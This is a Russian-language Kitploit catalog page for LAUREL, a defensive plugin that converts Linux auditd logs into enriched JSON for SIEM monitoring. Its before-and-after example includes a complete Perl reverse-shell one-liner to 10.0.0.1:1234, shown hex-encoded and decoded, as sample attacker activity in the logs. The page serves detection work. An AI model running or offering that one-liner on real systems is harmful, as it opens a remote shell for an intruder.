Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/threathunters-io/laurel
Оборонительные ИнструментыАнализ Журналов
GitHubthreathunters-io/laurel

laurel

Преобразование журналов аудита Linux для использования в SIEM

Репозиторий
851652 дней назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

logo

Linux Audit – Удобное, надёжное, простое логирование

Build Status

LAUREL — это плагин постобработки событий для auditd(8), который создаёт полезные, обогащённые журналы аудита в формате JSON, подходящие для современных систем мониторинга безопасности.

Документацию, соответствующую последнему стабильному релизу, можно найти здесь.

Зачем?

TLDR: Вместо событий аудита, которые выглядят так…

root@kitploit:~
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

…LAUREL превращает их в JSON-логи, где беспорядок, который пытаются устроить атакующие/пентестеры/красные команды, становится очевидным с первого взгляда:

root@kitploit:~
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}

Это происходит на источнике, потому что LAUREL работает на хосте, где генерируются события аудита. События обогащаются полезной информацией о родительском процессе (ppid):

root@kitploit:~
"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}

Документация

Детали конфигурации и эксплуатации описаны на странице руководства laurel(8). Подробности о формате логов и обосновании можно найти на странице руководства laurel-about(7). Страница laurel-audit-rules(7) содержит советы и примеры по настройке правил аудита, полезных для обнаружения тактик атакующих.

Инструкции по установке LAUREL содержат указания по сборке LAUREL из исходного кода, а также по его установке и настройке.

Мы разработали LAUREL, потому что нас не устраивали наборы функций и производительность существующих проектов и продуктов. Пожалуйста, обратитесь к документу Производительность за подробностями.

См. также

  • ansible-auditd-laurel, роль Ansible для развёртывания auditd + laurel, автор @0xFustang / CERT-EU

Лицензия

GNU General Public License, version 3

Авторы

  • Hilko Bengen <[email protected]>
  • Sergej Schmidt <[email protected]>

Логотип создан Birgit Meyer <[email protected]>.

Скачать инструмент